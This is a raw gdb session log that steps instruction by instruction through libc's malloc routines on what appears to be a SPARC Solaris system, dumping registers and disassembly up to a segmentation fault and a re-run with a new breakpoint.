l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x7a27c 500348
i2 0x0 0
i3 0xff33c008 -13385720
i4 0x21eec 138988
i5 0xff2c1da0 -13886048
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
psr 0xfe400003 -29360125 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:3
wim 0x0 0
tbr 0x0 0
pc 0xff2c1dc8 4281081288
npc 0xff2c1dcc -13886004
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) si
0xff2c1dcc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1dd0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1dd4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1dd8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ddc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1de0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c1de0 <_malloc_unlocked+28>: bleu 0xff2c1e00 <_malloc_unlocked+60>
0xff2c1de4 <_malloc_unlocked+32>: add %o1, %o7, %i2
0xff2c1de8 <_malloc_unlocked+36>: call 0xff33d068 <_PROCEDURE_LINKAGE_TABLE_+96>
0xff2c1dec <_malloc_unlocked+40>: nop
0xff2c1df0 <_malloc_unlocked+44>: mov 0xc, %o1 ! 0xc
0xff2c1df4 <_malloc_unlocked+48>: st %o1, [ %o0 ]
0xff2c1df8 <_malloc_unlocked+52>: ret
0xff2c1dfc <_malloc_unlocked+56>: restore %g0, 0, %o0
0xff2c1e00 <_malloc_unlocked+60>: ld [ %i2 + 0x4a4 ], %o1
0xff2c1e04 <_malloc_unlocked+64>: andcc %i0, 7, %o0
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0xffffdfe7 -8217
o1 0x7a23c 500284
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0xff2c1dcc -13886004
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x7a27c 500348
i2 0x0 0
i3 0xff33c008 -13385720
i4 0x21eec 138988
i5 0xff2c1da0 -13886048
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
psr 0xfe100003 -32505853 icc:---C, pil:0, s:0, ps:0, et:0, cwp:3
wim 0x0 0
tbr 0x0 0
pc 0xff2c1de0 4281081312
npc 0xff2c1de4 -13885980
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1de0 <_malloc_unlocked+28>: bleu 0xff2c1e00 <_malloc_unlocked+60>
0xff2c1de4 <_malloc_unlocked+32>: add %o1, %o7, %i2
0xff2c1de8 <_malloc_unlocked+36>: call 0xff33d068 <_PROCEDURE_LINKAGE_TABLE_+96>
0xff2c1dec <_malloc_unlocked+40>: nop
0xff2c1df0 <_malloc_unlocked+44>: mov 0xc, %o1 ! 0xc
0xff2c1df4 <_malloc_unlocked+48>: st %o1, [ %o0 ]
0xff2c1df8 <_malloc_unlocked+52>: ret
0xff2c1dfc <_malloc_unlocked+56>: restore %g0, 0, %o0
0xff2c1e00 <_malloc_unlocked+60>: ld [ %i2 + 0x4a4 ], %o1
0xff2c1e04 <_malloc_unlocked+64>: andcc %i0, 7, %o0
(gdb) si
0xff2c1de4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e00 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c1e00 <_malloc_unlocked+60>: ld [ %i2 + 0x4a4 ], %o1
0xff2c1e04 <_malloc_unlocked+64>: andcc %i0, 7, %o0
0xff2c1e08 <_malloc_unlocked+68>: mov %i0, %i3
0xff2c1e0c <_malloc_unlocked+72>: ld [ %i2 + 0x49c ], %o3
0xff2c1e10 <_malloc_unlocked+76>: neg %o0
0xff2c1e14 <_malloc_unlocked+80>: ld [ %o1 ], %o2
0xff2c1e18 <_malloc_unlocked+84>: add %o0, 8, %o0
0xff2c1e1c <_malloc_unlocked+88>: ld [ %o3 ], %o4
0xff2c1e20 <_malloc_unlocked+92>: be 0xff2c1e2c <_malloc_unlocked+104>
0xff2c1e24 <_malloc_unlocked+96>: cmp %o2, 0
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0xffffdfe7 -8217
o1 0x7a23c 500284
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0xff2c1dcc -13886004
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x7a27c 500348
i2 0xff33c008 -13385720
i3 0xff33c008 -13385720
i4 0x21eec 138988
i5 0xff2c1da0 -13886048
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
psr 0xfe100000 -32505856 icc:---C, pil:0, s:0, ps:0, et:0, cwp:0
wim 0x0 0
tbr 0x0 0
pc 0xff2c1e00 4281081344
npc 0xff2c1e04 -13885948
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1e00 <_malloc_unlocked+60>: ld [ %i2 + 0x4a4 ], %o1
0xff2c1e04 <_malloc_unlocked+64>: andcc %i0, 7, %o0
0xff2c1e08 <_malloc_unlocked+68>: mov %i0, %i3
0xff2c1e0c <_malloc_unlocked+72>: ld [ %i2 + 0x49c ], %o3
0xff2c1e10 <_malloc_unlocked+76>: neg %o0
0xff2c1e14 <_malloc_unlocked+80>: ld [ %o1 ], %o2
0xff2c1e18 <_malloc_unlocked+84>: add %o0, 8, %o0
0xff2c1e1c <_malloc_unlocked+88>: ld [ %o3 ], %o4
0xff2c1e20 <_malloc_unlocked+92>: be 0xff2c1e2c <_malloc_unlocked+104>
0xff2c1e24 <_malloc_unlocked+96>: cmp %o2, 0
(gdb) si
0xff2c1e04 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e08 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x4 4
o1 0xff34284c -13359028
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0xff2c1dcc -13886004
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x7a27c 500348
i2 0xff33c008 -13385720
i3 0xff33c008 -13385720
i4 0x21eec 138988
i5 0xff2c1da0 -13886048
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
psr 0xfe000004 -33554428 icc:----, pil:0, s:0, ps:0, et:0, cwp:4
wim 0x0 0
tbr 0x0 0
pc 0xff2c1e08 4281081352
npc 0xff2c1e0c -13885940
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1e08 <_malloc_unlocked+68>: mov %i0, %i3
0xff2c1e0c <_malloc_unlocked+72>: ld [ %i2 + 0x49c ], %o3
0xff2c1e10 <_malloc_unlocked+76>: neg %o0
0xff2c1e14 <_malloc_unlocked+80>: ld [ %o1 ], %o2
0xff2c1e18 <_malloc_unlocked+84>: add %o0, 8, %o0
0xff2c1e1c <_malloc_unlocked+88>: ld [ %o3 ], %o4
0xff2c1e20 <_malloc_unlocked+92>: be 0xff2c1e2c <_malloc_unlocked+104>
0xff2c1e24 <_malloc_unlocked+96>: cmp %o2, 0
0xff2c1e28 <_malloc_unlocked+100>: add %i0, %o0, %i3
0xff2c1e2c <_malloc_unlocked+104>: be 0xff2c1eb4 <_malloc_unlocked+240>
(gdb) si
0xff2c1e0c in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e10 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e14 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e18 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e1c in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e20 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e24 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e28 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e2c in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1e30 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1eb4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1eb8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c2d28 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d2c in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d30 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d34 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d38 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d3c in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d40 in cleanfree () from /usr/lib/libc.so.1
(gdb) x/10i 0xff2c1e28
0xff2c1e28 <_malloc_unlocked+100>: add %i0, %o0, %i3
0xff2c1e2c <_malloc_unlocked+104>: be 0xff2c1eb4 <_malloc_unlocked+240>
0xff2c1e30 <_malloc_unlocked+108>: clr %i5
0xff2c1e34 <_malloc_unlocked+112>: ld [ %o2 + -8 ], %o0
0xff2c1e38 <_malloc_unlocked+116>: and %o0, -4, %o5
0xff2c1e3c <_malloc_unlocked+120>: cmp %o5, %i3
0xff2c1e40 <_malloc_unlocked+124>: bne 0xff2c1e68 <_malloc_unlocked+164>
0xff2c1e44 <_malloc_unlocked+128>: add %o4, 0x1f, %o0
0xff2c1e48 <_malloc_unlocked+132>: clr [ %o1 ]
0xff2c1e4c <_malloc_unlocked+136>: and %o0, 0x1f, %o0
(gdb) x/10i 0xff2c1eb4
0xff2c1eb4 <_malloc_unlocked+240>: call 0xff2c2d28 <cleanfree>
0xff2c1eb8 <_malloc_unlocked+244>: clr %o0
0xff2c1ebc <_malloc_unlocked+248>: cmp %i3, 0x28
0xff2c1ec0 <_malloc_unlocked+252>: bcc 0xff2c1ed0 <_malloc_unlocked+268>
0xff2c1ec4 <_malloc_unlocked+256>: clr %i4
0xff2c1ec8 <_malloc_unlocked+260>: call 0xff2c1cdc <_smalloc>
0xff2c1ecc <_malloc_unlocked+264>: restore %g0, %i3, %o0
0xff2c1ed0 <_malloc_unlocked+268>: ld [ %i2 + 0x4b0 ], %o0
0xff2c1ed4 <_malloc_unlocked+272>: ld [ %o0 ], %i1
0xff2c1ed8 <_malloc_unlocked+276>: clr %o0
(gdb) si
0xff2c2d44 in cleanfree () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c2d44 <cleanfree+28>: ld [ %i1 + 0x4a0 ], %i2
0xff2c2d48 <cleanfree+32>: ld [ %o0 ], %o0
0xff2c2d4c <cleanfree+36>: add %i2, 0x80, %i3
0xff2c2d50 <cleanfree+40>: sll %o0, 2, %o0
0xff2c2d54 <cleanfree+44>: add %o0, %i2, %i4
0xff2c2d58 <cleanfree+48>: cmp %i4, %i2
0xff2c2d5c <cleanfree+52>: be,a 0xff2c2d64 <cleanfree+60>
0xff2c2d60 <cleanfree+56>: mov %i3, %i4
0xff2c2d64 <cleanfree+60>: sub %i4, 4, %i4
0xff2c2d68 <cleanfree+64>: ld [ %i4 ], %o0
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0xff3427c8 -13359160
o1 0x792dc 496348
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeede0 4290702816
o7 0xff2c2d2c -13882068
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x0 0
i1 0xff33c008 -13385720
i2 0x0 0
i3 0xff3427c8 -13359160
i4 0x0 0
i5 0x0 0
fp 0xffbeee40 4290702912
i7 0xff2c1eb4 -13885772
y 0x0 0
psr 0xfe400002 -29360126 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:2
wim 0x0 0
tbr 0x0 0
pc 0xff2c2d44 4281085252
npc 0xff2c2d48 -13882040
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c2d44 <cleanfree+28>: ld [ %i1 + 0x4a0 ], %i2
0xff2c2d48 <cleanfree+32>: ld [ %o0 ], %o0
0xff2c2d4c <cleanfree+36>: add %i2, 0x80, %i3
0xff2c2d50 <cleanfree+40>: sll %o0, 2, %o0
0xff2c2d54 <cleanfree+44>: add %o0, %i2, %i4
0xff2c2d58 <cleanfree+48>: cmp %i4, %i2
0xff2c2d5c <cleanfree+52>: be,a 0xff2c2d64 <cleanfree+60>
0xff2c2d60 <cleanfree+56>: mov %i3, %i4
0xff2c2d64 <cleanfree+60>: sub %i4, 4, %i4
0xff2c2d68 <cleanfree+64>: ld [ %i4 ], %o0
(gdb) si
0xff2c2d48 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d4c in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d50 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d54 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d58 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d5c in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d60 in cleanfree () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x0 0
o1 0x792dc 496348
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeede0 4290702816
o7 0xff2c2d2c -13882068
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x0 0
i1 0xff33c008 -13385720
i2 0xff3427cc -13359156
i3 0xff34284c -13359028
i4 0xff3427cc -13359156
i5 0x0 0
fp 0xffbeee40 4290702912
i7 0xff2c1eb4 -13885772
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe400002 -29360126 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:2
wim 0x0 0
tbr 0x0 0
pc 0xff2c2d60 4281085280
npc 0xff2c2d64 -13882012
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c2d60 <cleanfree+56>: mov %i3, %i4
0xff2c2d64 <cleanfree+60>: sub %i4, 4, %i4
0xff2c2d68 <cleanfree+64>: ld [ %i4 ], %o0
0xff2c2d6c <cleanfree+68>: cmp %o0, 0
0xff2c2d70 <cleanfree+72>: be 0xff2c2d94 <cleanfree+108>
0xff2c2d74 <cleanfree+76>: cmp %o0, %i5
0xff2c2d78 <cleanfree+80>: be,a 0xff2c2d58 <cleanfree+48>
0xff2c2d7c <cleanfree+84>: clr [ %i4 ]
0xff2c2d80 <cleanfree+88>: call 0xff2c240c <realfree>
0xff2c2d84 <cleanfree+92>: nop
(gdb) si
0xff2c2d64 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d68 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d6c in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d70 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d74 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d94 in cleanfree () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c2d94 <cleanfree+108>: ld [ %i1 + 0x49c ], %o0
0xff2c2d98 <cleanfree+112>: clr [ %o0 ]
0xff2c2d9c <cleanfree+116>: ld [ %i1 + 0x4a4 ], %o0
0xff2c2da0 <cleanfree+120>: clr [ %o0 ]
0xff2c2da4 <cleanfree+124>: ret
0xff2c2da8 <cleanfree+128>: restore
0xff2c2dac <memalign>: save %sp, -96, %sp
0xff2c2db0 <memalign+4>: call 0xff2c2db8 <memalign+12>
0xff2c2db4 <memalign+8>: sethi %hi(0x79000), %o1
0xff2c2db8 <memalign+12>: sethi %hi(0x80000000), %o0
(gdb) i
"info" must be followed by the name of an info command.
List of info subcommands:
info address -- Describe where symbol SYM is stored
info all-registers -- List of all registers and their contents
info args -- Argument variables of current stack frame
info breakpoints -- Status of user-settable breakpoints
info catch -- Exceptions that can be caught in the current stack frame
info common -- Print out the values contained in a Fortran COMMON block
info copying -- Conditions for redistributing copies of GDB
info dcache -- Print information on the dcache performance
info display -- Expressions to display when program stops
info extensions -- All filename extensions associated with a source language
info files -- Names of targets and files being debugged
info float -- Print the status of the floating point unit
info frame -- All about selected stack frame
info functions -- All function names
info handle -- What debugger does when program gets various signals
info line -- Core addresses of the code for a source line
info locals -- Local variables of current stack frame
info macro -- Show the definition of MACRO
info mem -- Memory region attributes
info proc -- Show /proc process information about any running process
info program -- Execution status of the program
info registers -- List of integer registers and their contents
info remote-process -- Query the remote system for process info
info scope -- List the variables local to a scope
info set -- Show all GDB settings
info sharedlibrary -- Status of loaded shared object libraries
info signals -- What debugger does when program gets various signals
info source -- Information about the current source file
info sources -- Source files in the program
info stack -- Backtrace of the stack
info symbol -- Describe what symbol is at location ADDR
---Type <return> to continue, or q <return> to quit---qi
Quit
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x0 0
o1 0x792dc 496348
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeede0 4290702816
o7 0xff2c2d2c -13882068
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x0 0
i1 0xff33c008 -13385720
i2 0xff3427cc -13359156
i3 0xff34284c -13359028
i4 0xff342848 -13359032
i5 0x0 0
fp 0xffbeee40 4290702912
i7 0xff2c1eb4 -13885772
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe400000 -29360128 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:0
wim 0x0 0
tbr 0x0 0
pc 0xff2c2d94 4281085332
npc 0xff2c2d98 -13881960
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c2d94 <cleanfree+108>: ld [ %i1 + 0x49c ], %o0
0xff2c2d98 <cleanfree+112>: clr [ %o0 ]
0xff2c2d9c <cleanfree+116>: ld [ %i1 + 0x4a4 ], %o0
0xff2c2da0 <cleanfree+120>: clr [ %o0 ]
0xff2c2da4 <cleanfree+124>: ret
0xff2c2da8 <cleanfree+128>: restore
0xff2c2dac <memalign>: save %sp, -96, %sp
0xff2c2db0 <memalign+4>: call 0xff2c2db8 <memalign+12>
0xff2c2db4 <memalign+8>: sethi %hi(0x79000), %o1
0xff2c2db8 <memalign+12>: sethi %hi(0x80000000), %o0
(gdb) si
0xff2c2d98 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2d9c in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2da0 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2da4 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c2da8 in cleanfree () from /usr/lib/libc.so.1
(gdb)
0xff2c1ebc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c1ebc <_malloc_unlocked+248>: cmp %i3, 0x28
0xff2c1ec0 <_malloc_unlocked+252>: bcc 0xff2c1ed0 <_malloc_unlocked+268>
0xff2c1ec4 <_malloc_unlocked+256>: clr %i4
0xff2c1ec8 <_malloc_unlocked+260>: call 0xff2c1cdc <_smalloc>
0xff2c1ecc <_malloc_unlocked+264>: restore %g0, %i3, %o0
0xff2c1ed0 <_malloc_unlocked+268>: ld [ %i2 + 0x4b0 ], %o0
0xff2c1ed4 <_malloc_unlocked+272>: ld [ %o0 ], %i1
0xff2c1ed8 <_malloc_unlocked+276>: clr %o0
0xff2c1edc <_malloc_unlocked+280>: cmp %i1, 0
0xff2c1ee0 <_malloc_unlocked+284>: be 0xff2c1f80 <_malloc_unlocked+444>
(gdb) si
0xff2c1ec0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ec4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ed0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ed4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0xff342858 -13359016
o1 0xff33c008 -13385720
o2 0xff3427cc -13359156
o3 0xff34284c -13359028
o4 0xff342848 -13359032
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0xff2c1eb4 -13885772
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x7a27c 500348
i2 0xff33c008 -13385720
i3 0x130 304
i4 0x0 0
i5 0x0 0
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe000004 -33554428 icc:----, pil:0, s:0, ps:0, et:0, cwp:4
wim 0x0 0
tbr 0x0 0
pc 0xff2c1ed4 4281081556
npc 0xff2c1ed8 -13885736
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1ed4 <_malloc_unlocked+272>: ld [ %o0 ], %i1
0xff2c1ed8 <_malloc_unlocked+276>: clr %o0
0xff2c1edc <_malloc_unlocked+280>: cmp %i1, 0
0xff2c1ee0 <_malloc_unlocked+284>: be 0xff2c1f80 <_malloc_unlocked+444>
0xff2c1ee4 <_malloc_unlocked+288>: cmp %i4, 0
0xff2c1ee8 <_malloc_unlocked+292>: ld [ %i1 ], %o1
0xff2c1eec <_malloc_unlocked+296>: cmp %o1, %i3
0xff2c1ef0 <_malloc_unlocked+300>: bcs 0xff2c1f2c <_malloc_unlocked+360>
0xff2c1ef4 <_malloc_unlocked+304>: cmp %o0, 0
0xff2c1ef8 <_malloc_unlocked+308>: be 0xff2c1f08 <_malloc_unlocked+324>
(gdb) si
0xff2c1ed8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1edc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ee0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ee4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1f80 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c1f80 <_malloc_unlocked+444>: bne 0xff2c1fd8 <_malloc_unlocked+532>
0xff2c1f84 <_malloc_unlocked+448>: ld [ %i2 + 0x4ac ], %o0
0xff2c1f88 <_malloc_unlocked+452>: ld [ %o0 ], %o1
0xff2c1f8c <_malloc_unlocked+456>: cmp %o1, 0
0xff2c1f90 <_malloc_unlocked+460>: be 0xff2c1fbc <_malloc_unlocked+504>
0xff2c1f94 <_malloc_unlocked+464>: nop
0xff2c1f98 <_malloc_unlocked+468>: ld [ %o1 ], %o0
0xff2c1f9c <_malloc_unlocked+472>: mov %o1, %i4
0xff2c1fa0 <_malloc_unlocked+476>: cmp %i3, %o0
0xff2c1fa4 <_malloc_unlocked+480>: bgu 0xff2c1fbc <_malloc_unlocked+504>
(gdb) si
0xff2c1f84 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1f88 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1f8c in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1f90 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1f94 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1f98 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1f9c in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fa0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fa4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c1fa4 <_malloc_unlocked+480>: bgu 0xff2c1fbc <_malloc_unlocked+504>
0xff2c1fa8 <_malloc_unlocked+484>: nop
0xff2c1fac <_malloc_unlocked+488>: and %o0, -4, %o0
0xff2c1fb0 <_malloc_unlocked+492>: st %o0, [ %o1 ]
0xff2c1fb4 <_malloc_unlocked+496>: b 0xff2c1fdc <_malloc_unlocked+536>
0xff2c1fb8 <_malloc_unlocked+500>: ld [ %i4 ], %o0
0xff2c1fbc <_malloc_unlocked+504>: call 0xff2c2670 <_morecore>
0xff2c1fc0 <_malloc_unlocked+508>: mov %i3, %o0
0xff2c1fc4 <_malloc_unlocked+512>: orcc %g0, %o0, %i4
0xff2c1fc8 <_malloc_unlocked+516>: bne,a 0xff2c1fdc <_malloc_unlocked+536>
(gdb) si
0xff2c1fa8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fac in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fb0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fb4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fb8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fdc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fe0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
Program received signal SIGSEGV, Segmentation fault.
0xff2c1fe0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x41022a28 1090660904
o1 0x20d60 134496
o2 0xff3427cc -13359156
o3 0xff34284c -13359028
o4 0xff342848 -13359032
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0xff2c1eb4 -13885772
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x0 0
i2 0xff33c008 -13385720
i3 0x130 304
i4 0x20d60 134496
i5 0x0 0
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/10i 0xff2c1fdc
0xff2c1fdc <_malloc_unlocked+536>: add %i4, %o0, %o0
0xff2c1fe0 <_malloc_unlocked+540>: ld [ %o0 + 8 ], %o1
0xff2c1fe4 <_malloc_unlocked+544>: and %o1, -3, %o1
0xff2c1fe8 <_malloc_unlocked+548>: st %o1, [ %o0 + 8 ]
0xff2c1fec <_malloc_unlocked+552>: ld [ %i4 ], %o2
0xff2c1ff0 <_malloc_unlocked+556>: sub %o2, %i3, %o0
0xff2c1ff4 <_malloc_unlocked+560>: cmp %o0, 0x30
0xff2c1ff8 <_malloc_unlocked+564>: bcs 0xff2c2024 <_malloc_unlocked+608>
0xff2c1ffc <_malloc_unlocked+568>: sub %o0, 8, %o1
0xff2c2000 <_malloc_unlocked+572>: st %i3, [ %i4 ]
(gdb) b *0xff2c1fdc
Breakpoint 5 at 0xff2c1fdc
(gdb) r 801
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out 801
Breakpoint 3, 0xff2c1d8c in malloc () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Breakpoint 5, 0xff2c1fdc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
